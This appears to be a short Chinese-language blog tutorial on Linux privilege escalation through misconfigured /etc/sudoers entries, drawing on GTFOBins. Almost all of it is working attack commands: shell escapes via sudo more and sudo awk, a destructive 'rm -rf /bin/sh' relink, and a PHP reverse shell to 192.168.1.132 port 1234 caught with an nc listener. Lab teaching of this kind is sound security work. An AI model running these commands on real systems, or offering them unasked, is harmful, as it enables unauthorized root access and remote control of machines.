参考网站:https://gtfobins.github.io/
kali linux 下etc/sudoers 文件解析
vim /etc/sudoers
sudo su 切换root用户
当使用sudo命令进行提权时,需要验证当前用户的密码:
一,sudo more 命令提权
修改文件 /etc/sudoers
在执行命令时:
提权方法:执行以下命令
sudo more /etc/passwd
在接着输入
!/bin/sh
提权成功,如图
二,sudo awk 提权
修改文件 /etc/sudoers
执行命令:
sudo awk 'BEGIN{system("/bin/sh")}'
提权成功
三,php反弹提权
先在kali下执行以下命令,重建一下软连接
rm -rf /bin/sh
ln -s /bin/bash /bin/sh
修改文件 /etc/sudoers
公网执行nc命令监听:
nc -lvp 1234
kali linux 下执行:
sudo php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/bash -i >& /dev/tcp/192.168.1.132/1234 0>&1");'
查看公网cmd窗口变化
提权成功。